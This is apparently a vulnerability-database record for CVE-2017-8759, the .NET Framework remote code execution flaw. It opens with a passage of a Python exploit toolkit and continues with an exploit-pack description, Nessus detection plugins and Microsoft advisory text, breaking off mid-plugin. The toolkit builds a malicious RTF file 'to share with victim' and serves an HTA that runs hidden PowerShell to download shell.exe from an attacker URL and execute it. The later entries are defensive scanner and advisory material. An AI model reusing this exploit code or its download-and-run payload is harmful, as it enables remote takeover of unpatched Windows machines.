\nprint \"\\nThis is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)\\n\" \nprint \"Modes:\\n\" \nprint \" -M gen Generate Malicious file only\\n\" \nprint \" Generate malicious payload:\\n\" \nprint \" -w <Filename.rtf> Name of malicious RTF file (Share this file with victim).\\n\" \nprint \" -u <http://attacker.com/test.txt> Path of remote txt file. Normally, this should be a domain or IP where this tool is running.\\n\" \nprint \" For example, http://attacker.com/test.txt (This URL will be included in malicious file and\\n\" \nprint \" will be requested once victim will open malicious RTF file.\\n\" \nprint \" -M exp Start exploitation mode\\n\" \nprint \" Exploitation:\\n\" \nprint \" -p <TCP port:Default 80> Local port number.\\n\" \nprint \" -e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.\\n\" \nprint \" -l </tmp/shell.exe> Specify local path of an executable file / meterpreter shell / payload.\\n\" \nsys.exit() \nelif opt in (\"-M\",\"--mode\"): \nmode = arg \nelif opt in (\"-w\", \"--filename\"): \nfilename = arg \nelif opt in (\"-u\", \"--docuri\"): \ndocuri = arg \nelif opt in (\"-p\", \"--port\"): \nport = int(arg) \nelif opt in (\"-e\", \"--payloadurl\"): \npayloadurl = arg \nelif opt in (\"-l\", \"--payloadlocation\"): \npayloadlocation = arg \nif \"gen\" in mode: \nif (len(filename)<1): \nprint 'Usage: python '+sys.argv[0]+' -h' \nsys.exit() \nif (len(docuri)<1): \nprint 'Usage: python '+sys.argv[0]+' -h' \nsys.exit() \nprint \"Generating normal RTF payload.\\n\" \ngenerate_exploit_rtf() \nsys.exit() \nmode = 'Finished' \nif \"exp\" in mode: \n \nif (len(payloadurl)<1): \nprint 'Usage: python '+sys.argv[0]+' -h' \nsys.exit() \nif (len(payloadurl)>1 and len(payloadlocation)<1): \nprint \"Running exploit mode (Deliver HTA with remote payload) - waiting for victim to connect\" \nexploitation_rtf() \nmode = 'Finished' \nsys.exit() \nif 
(len(payloadurl)>1 and len(payloadlocation)>1): \nprint \"Running exploit mode (Deliver HTA + Local Payload) - waiting for victim to connect\" \nexploitation_rtf() \nmode = 'Finished' \nif not \"Finished\" in mode: \nprint 'Usage: python '+sys.argv[0]+' -h' \nsys.exit() \ndef generate_exploit_rtf(): \n# Preparing malicious RTF \ns = docuri \ndocuri_hex = \"00\".join(\"{:02x}\".format(ord(c)) for c in s) \ndocuri_pad_len = 714 - len(docuri_hex) \ndocuri_pad = \"0\"*docuri_pad_len \npayload = \"{\\\\rtf1\\\\adeflang1025\\\\ansi\\\\ansicpg1252\\\\uc1\\\\adeff31507\\\\deff0\\\\stshfdbch31505\\\\stshfloch31506\\\\stshfhich31506\\\\stshfbi31507\\\\deflang1033\\\\deflangfe2052\\\\themelang1033\\\\themelangfe2052\\\\themelangcs0\\n\" \npayload += \"{\\\\info\\n\" \npayload += \"{\\\\author }\\n\" \npayload += \"{\\\\operator }\\n\" \npayload += \"}\\n\" \npayload += \"{\\\\*\\\\xmlnstbl {\\\\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}\\n\" \npayload += \"{\\n\" \npayload += \"{\\\\object\\\\objautlink\\\\objupdate\\\\rsltpict\\\\objw291\\\\objh230\\\\objscalex99\\\\objscaley101\\n\" \npayload += \"{\\\\*\\\\objclass Word.Document.8}\\n\" \npayload += \"{\\\\*\\\\objdata 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\"+docuri_hex+docuri_pad+\"00ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000}\\n\" \npayload += \"{\\\\result {\\\\rtlch\\\\fcs1 \\\\af31507 \\\\ltrch\\\\fcs0 \\\\insrsid1979324 }}}}\\n\" \npayload += \"{\\\\*\\\\datastore }\\n\" \npayload += \"}\\n\" \nf = open(filename, 'w') \nf.write(payload) \nf.close() \nprint \"Generated \"+filename+\" successfully\" \n \ndef exploitation_rtf(): \n \nprint \"Server Running on \",host,\":\",port \n \ntry: \n# create a socket \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n \n# associate the socket to host and port \ns.bind((host, port)) \n 
\n# listenning \ns.listen(BACKLOG) \n \nexcept socket.error, (value, message): \nif s: \ns.close() \nprint \"Could not open socket:\", message \nsys.exit(1) \n \n# get the connection from client \nwhile 1: \nconn, client_addr = s.accept() \n \n# create a thread to handle request \nthread.start_new_thread(server_thread, (conn, client_addr)) \n \ns.close() \n \ndef server_thread(conn, client_addr): \n \n# get the request from browser \ntry: \nrequest = conn.recv(MAX_DATA_RECV) \nif (len(request) > 0): \n# parse the first line \nfirst_line = request.split('\\n')[0] \n \n# get method \nmethod = first_line.split(' ')[0] \ntry: \nurl = first_line.split(' ')[1] \nexcept IndexError: \nprint \"Invalid request from \"+client_addr[0] \nconn.close() \nsys.exit(1) \n \nif \".exe\" in url: \nprint \"Received request for payload from \"+client_addr[0] \ntry: \nsize = os.path.getsize(payloadlocation) \nexcept OSError: \nprint \"Unable to read \"+payloadlocation \nconn.close() \nsys.exit(1) \ndata = \"HTTP/1.1 200 OK\\r\\nDate: Sun, 16 Apr 2017 18:56:41 GMT\\r\\nServer: Apache/2.4.25 (Debian)\\r\\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: \"+str(size)+\"\\r\\nKeep-Alive: timeout=5, max=100\\r\\nConnection: Keep-Alive\\r\\nContent-Type: application/x-msdos-program\\r\\n\\r\\n\" \nwith open(payloadlocation) as fin: \ndata +=fin.read() \nconn.send(data) \nconn.close() \nsys.exit(1) \nif \".hta\" in url: \nprint \"Received GET method from \"+client_addr[0] \ndata = \"HTTP/1.1 200 OK\\r\\nDate: Sun, 16 Apr 2017 17:11:03 GMT\\r\\nServer: Apache/2.4.25 (Debian)\\r\\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 315\\r\\nKeep-Alive: timeout=5, max=100\\r\\nConnection: Keep-Alive\\r\\nContent-Type: application/hta\\r\\n\\r\\n<script>\\na=new ActiveXObject(\\\"WScript.Shell\\\");\\na.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object 
System.Net.WebClient).DownloadFile(\\\\'\"+payloadurl+\"\\\\', \\\\'c:/windows/temp/shell.exe\\\\'); c:/windows/temp/shell.exe', 0);window.close();\\n</script>\\r\\n\" \nconn.send(data) \nconn.close() \nif \".txt\" in url: \nprint \"Received GET method from \"+client_addr[0] \ndata = 'HTTP/1.1 200 OK\\r\\nDate: Sun, 16 Apr 2017 17:11:03 GMT\\r\\nServer: Apache/2.4.25 (Debian)\\r\\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 2000\\r\\nKeep-Alive: timeout=5, max=100\\r\\nConnection: Keep-Alive\\r\\nContent-Type: text/plain\\r\\n\\r\\n<definitions\\n xmlns=\"http://schemas.xmlsoap.org/wsdl/\"\\n xmlns:soap=\"http://schemas.xmlsoap.org/wsdl/soap/\"\\n xmlns:suds=\"http://www.w3.org/2000/wsdl/suds\"\\n xmlns:tns=\"http://schemas.microsoft.com/clr/ns/System\"\\n xmlns:ns0=\"http://schemas.microsoft.com/clr/nsassem/Logo/Logo\">\\n <portType name=\"PortType\"/>\\n <binding name=\"Binding\" type=\"tns:PortType\">\\n <soap:binding style=\"rpc\" transport=\"http://schemas.xmlsoap.org/soap/http\"/>\\n <suds:class type=\"ns0:Image\" rootType=\"MarshalByRefObject\"></suds:class>\\n </binding>\\n <service name=\"Service\">\\n <port name=\"Port\" binding=\"tns:Binding\">\\n <soap:address location=\"'+payloadurl.split(':')[0]+\"://\"+payloadurl.split('/')[2]+'?C:\\Windows\\System32\\mshta.exe?'+payloadurl.split(':')[0]+\"://\"+payloadurl.split('/')[2]+'/cmd.hta\"/>\\n <soap:address location=\";\\n if (System.AppDomain.CurrentDomain.GetData(_url.Split(\\'?\\')[0]) == null) {\\n System.Diagnostics.Process.Start(_url.Split(\\'?\\')[1], _url.Split(\\'?\\')[2]);\\n System.AppDomain.CurrentDomain.SetData(_url.Split(\\'?\\')[0], true);\\n } //\"/>\\n </port>\\n </service>\\n</definitions>\\n' \nconn.send(data) \nconn.close() \nsys.exit(1) \nexcept socket.error, ex: \nprint ex \n \nif __name__ == '__main__': \nmain(sys.argv[1:]) \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 
"https://packetstormsecurity.com/files/download/144148/cve-2017-8759_toolkit.py.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows .NET Framework - Remote Code Execution", "edition": 1, "published": "2017-09-13T00:00:00", "title": "Microsoft Windows .NET Framework - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-8759"], "modified": "2017-09-13T00:00:00", "id": "EXPLOITPACK:BF5C8288A392CBC3E7947C012FB8E11E", "href": "", "sourceData": "Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample\n\nRunning CVE-2017-8759 exploit sample.\n\nFlow of the exploit:\n\nWord macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over wsdl, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe which in turn runs a powershell commands that runs mspaint.exe\n\nTo test:\n\nRun a webserver on port 8080, and put the files exploit.txt and cmd.hta on its root. For example python -m SimpleHTTPServer 8080\n\nIf all is good mspaint should run.\n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42711.zip", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:44:25", "description": "The .NET Framework installation on the remote host is missing a\nsecurity update. It is, therefore, affected by the following\nvulnerability:\n\n - A remote code execution vulnerability exists when Microsoft .NET\n Framework processes untrusted input. An attacker who successfully\n exploited this vulnerability in software using the .NET framework\n could take control of an affected system. An attacker could then\n install programs; view, change, or delete data; or create new\n accounts with full user rights. 
Users whose accounts are\n configured to have fewer user rights on the system could be less\n impacted than users who operate with administrative user rights.\n (CVE-2017-8759)", "edition": 34, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "Security and Quality Rollup for .NET Framework (Sep 2017)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:microsoft:.net_framework"], "id": "SMB_NT_MS17_SEP_4041083.NASL", "href": "https://www.tenable.com/plugins/nessus/103137", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103137);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_xref(name:\"MSFT\", value:\"MS17-4041086\");\n script_xref(name:\"MSKB\", value:\"4041093\");\n script_xref(name:\"MSFT\", value:\"MS17-4041093\");\n script_xref(name:\"MSKB\", value:\"4041083\");\n script_xref(name:\"MSFT\", value:\"MS17-4041083\");\n script_xref(name:\"MSKB\", value:\"4041090\");\n script_xref(name:\"MSFT\", value:\"MS17-4041090\");\n script_xref(name:\"MSKB\", value:\"4041084\");\n script_xref(name:\"MSFT\", value:\"MS17-4041084\");\n script_xref(name:\"MSKB\", value:\"4041091\");\n script_xref(name:\"MSFT\", value:\"MS17-4041091\");\n script_xref(name:\"MSKB\", value:\"4041085\");\n script_xref(name:\"MSFT\", value:\"MS17-4041085\");\n script_xref(name:\"MSKB\", value:\"4041092\");\n script_xref(name:\"MSFT\", value:\"MS17-4041092\");\n script_xref(name:\"MSKB\", value:\"4038781\");\n script_xref(name:\"MSFT\", value:\"MS17-4038781\");\n script_xref(name:\"MSKB\", value:\"4038783\");\n 
script_xref(name:\"MSFT\", value:\"MS17-4038783\");\n script_xref(name:\"MSKB\", value:\"4038782\");\n script_xref(name:\"MSFT\", value:\"MS17-4038782\");\n script_xref(name:\"MSKB\", value:\"4038788\");\n script_xref(name:\"MSFT\", value:\"MS17-4038788\");\n\n script_name(english:\"Security and Quality Rollup for .NET Framework (Sep 2017)\");\n script_summary(english:\"Checks the file versions.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a software framework installed that is\naffected by a security feature bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The .NET Framework installation on the remote host is missing a\nsecurity update. It is, therefore, affected by the following\nvulnerability:\n\n - A remote code execution vulnerability exists when Microsoft .NET\n Framework processes untrusted input. An attacker who successfully\n exploited this vulnerability in software using the .NET framework\n could take control of an affected system. An attacker could then\n install programs; view, change, or delete data; or create new\n accounts with full user rights. 
Users whose accounts are\n configured to have fewer user rights on the system could be less\n impacted than users who operate with administrative user rights.\n (CVE-2017-8759)\");\n # https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/5984735e-f651-e711-80dd-000d3a32fc99\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?39028b0b\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a9b7377f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Microsoft .NET Framework\n2.0 SP2, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, and 4.7\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_framework\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_dotnet_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"microsoft_net_framework_installed.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS17-09\";\nkbs = make_list(\n '4041086', # 2008 SP2 Cumulative Rollup All .Net\n '4041093', # 2008 SP2 Security Only Rollup All .Net\n '4041083', # 7 SP1 / 2008 R2 SP1 Cumulative Rollup All .Net\n '4041090', # 7 SP1 / 2008 R2 SP1 Security Only Rollup All .Net\n '4041084', # Server 2012 Cumulative Rollup All .Net\n '4041091', # Server 2012 Security Only Rollup All .Net\n '4041085', # 8.1 / 2012 R2 Cumulative Rollup All .Net\n '4041092', # 8.1 / 2012 R2 Security Only Rollup All .Net\n '4038781', # 10 RTM Cumulative Rollup All .Net\n '4038783', # 10 1511 Cumulative Rollup All .Net\n '4038782', # 10 1607 / Server 2016 Cumulative Rollup All .Net\n '4038788' # 10 1703 Cumulative Rollup All .Net\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif 
(\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\nelse if (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\napp = 'Microsoft .NET Framework';\nget_install_count(app_name:app, exit_if_zero:TRUE);\ninstalls = get_combined_installs(app_name:app);\n\nvuln = 0;\n\nif (installs[0] == 0)\n{\n foreach install (installs[1])\n {\n version = install['version'];\n if( version != UNKNOWN_VER &&\n smb_check_dotnet_rollup(rollup_date:\"09_2017\", dotnet_ver:version))\n vuln++;\n }\n}\nif(vuln)\n{\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, \"affected\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:31:00", "description": "The remote Windows host is missing multiple security updates released\non 2017/09/12. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. To exploit the vulnerability, an\n attacker on a guest operating system could run a\n specially crafted application that could cause the\n Hyper-V host operating system to disclose memory\n information. An attacker who successfully exploited the\n vulnerability could gain access to information on the\n Hyper-V host operating system. The security update\n addresses the vulnerability by correcting how Hyper-V\n validates guest operating system user input.\n (CVE-2017-8707)\n\n - An information disclosure vulnerability exists in the\n Windows System Information Console when it improperly\n parses XML input containing a reference to an external\n entity. 
An attacker who successfully exploited this\n vulnerability could read arbitrary files via an XML\n external entity (XXE) declaration. To exploit the\n vulnerability, an attacker could create a file\n containing specially crafted XML content and convince an\n authenticated user to open the file. The update\n addresses the vulnerability by modifying the way that\n the Windows System Information Console parses XML input.\n (CVE-2017-8710)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. To exploit this\n vulnerability, an attacker would have to log on to an\n affected system and run a specially crafted application.\n The security update addresses the vulnerability by\n correcting how the Windows kernel handles memory\n addresses. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. To exploit this\n vulnerability, an attacker would have to log on to an\n affected system and run a specially crafted application.\n The vulnerability would not allow an attacker to execute\n code or to elevate user rights directly, but it could be\n used to obtain information that could be used to try to\n further compromise the affected system. The update\n addresses the vulnerability by correcting the way in\n which the Windows Graphics Component handles objects in\n memory. (CVE-2017-8683)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. 
An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. Users whose accounts are\n configured to have fewer user rights on the system could\n be less impacted than users who operate with\n administrative user rights. There are multiple ways an\n attacker could exploit this vulnerability. In a web-\n based attack scenario, an attacker could host a\n specially crafted website that is designed to exploit\n this vulnerability and then convince a user to view the\n website. An attacker would have no way to force users to\n view the attacker-controlled content. Instead, an\n attacker would have to convince users to take action,\n typically by getting them to click a link in an email\n message or in an Instant Messenger message that takes\n users to the attacker's website, or by opening an\n attachment sent through email. In a file sharing attack\n scenario, an attacker could provide a specially crafted\n document file that is designed to exploit this\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerabilities by correcting how the Windows font\n library handles embedded fonts. (CVE-2017-8682)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. 
To exploit the\n vulnerability, a user must open a specially crafted\n file. In an email attack scenario, an attacker could\n exploit the vulnerability by sending the specially\n crafted file to the user and then convincing the user to\n open the file. In a web-based attack scenario, an\n attacker could host a website (or leverage a compromised\n website that accepts or hosts user-provided content)\n that contains a specially crafted file designed to\n exploit the vulnerability. An attacker would have no way\n to force a user to visit the website. Instead, an\n attacker would have to convince a user to click a link,\n typically by way of an enticement in an email or Instant\n Messenger message, and then convince the user to open\n the specially crafted file. The security update\n addresses the vulnerability by helping to ensure that\n Windows Shell validates file copy destinations.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. To exploit this vulnerability, an attacker\n would have to log on to an affected system and run a\n specially crafted application. The security update\n addresses the vulnerability by correcting how the\n Windows kernel handles memory addresses. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. To exploit this vulnerability, an\n attacker would first have to log on to the system. An\n attacker could then run a specially crafted application\n that could exploit the vulnerability and take control of\n an affected system. The update addresses this\n vulnerability by correcting how Win32k handles objects\n in memory. (CVE-2017-8720)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. To exploit this\n vulnerability, an attacker would have to log on to an\n affected system and run a specially crafted application.\n The vulnerability would not allow an attacker to execute\n code or to elevate user rights directly, but it could be\n used to obtain information that could be used to try to\n further compromise the affected system. The security\n update addresses the vulnerability by correcting how the\n Windows GDI+ component handles objects in memory.\n (CVE-2017-8680, CVE-2017-8681, CVE-2017-8684,\n CVE-2017-8685)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. 
An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights. There are\n multiple ways an attacker could exploit this\n vulnerability: In a web-based attack scenario, an\n attacker could host a specially crafted website designed\n to exploit this vulnerability and then convince a user\n to view the website. An attacker would have no way to\n force users to view the attacker-controlled content.\n Instead, an attacker would have to convince users to\n take action, typically by getting them to click a link\n in an email or instant message that takes users to the\n attacker's website, or by opening an attachment sent\n through email. In a file-sharing attack scenario, an\n attacker could provide a specially crafted document file\n designed to exploit this vulnerability and then convince\n a user to open the document file.The security update\n addresses the vulnerability by correcting how Windows\n Uniscribe handles objects in memory. (CVE-2017-8696)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. To exploit this vulnerability, an\n attacker would have to log on to an affected system and\n run a specially crafted application. The security update\n addresses the vulnerability by correcting how GDI+\n handles memory addresses. 
(CVE-2017-8688)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n To exploit the vulnerability, the attacker needs to be\n within the physical proximity of the targeted user, and\n the user's computer needs to have Bluetooth enabled. The\n attacker can then initiate a Bluetooth connection to the\n target computer without the user's knowledge. The\n security update addresses the vulnerability by\n correcting how Windows handles Bluetooth requests.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. To exploit this vulnerability, an attacker would\n have to log on to an affected system and run a specially\n crafted application. 
The vulnerability would not allow\n an attacker to execute code or to elevate user rights\n directly, but it could be used to obtain information\n that could be used to try to further compromise the\n affected system. The update addresses the vulnerability\n by correcting how the Windows kernel handles objects in\n memory. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. To exploit this vulnerability, an\n attacker would have to log on to an affected system and\n run a specially crafted application. Note that where the\n severity is indicated as Critical in the Affected\n Products table, the Preview Pane is an attack vector for\n this vulnerability. The security update addresses the\n vulnerability by correcting how GDI handles memory\n addresses. 
(CVE-2017-8676)", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "Windows 2008 September 2017 Multiple Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8681", "CVE-2017-8741", "CVE-2017-8707", "CVE-2017-8685", "CVE-2017-8695", "CVE-2017-8682", "CVE-2017-8684", "CVE-2017-8710", "CVE-2017-8719", "CVE-2017-8699", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8680", "CVE-2017-8678", "CVE-2017-8628", "CVE-2017-8696", "CVE-2017-8679", "CVE-2017-8687", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8733", "CVE-2017-8675"], "modified": "2017-09-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/103140", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103140);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\n \"CVE-2017-8628\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8680\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8684\",\n \"CVE-2017-8685\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8695\",\n \"CVE-2017-8696\",\n \"CVE-2017-8699\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8710\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8733\",\n \"CVE-2017-8741\",\n \"CVE-2017-8759\"\n );\n script_bugtraq_id(\n 100720,\n 100722,\n 100724,\n 100727,\n 100736,\n 100737,\n 100742,\n 100744,\n 100752,\n 100755,\n 100756,\n 100764,\n 100769,\n 100772,\n 100773,\n 100780,\n 100781,\n 100782,\n 100783,\n 100790,\n 100791,\n 100792,\n 100793,\n 100803,\n 100804\n );\n script_xref(name:\"MSKB\", value:\"4032201\");\n script_xref(name:\"MSFT\", value:\"MS17-4032201\");\n 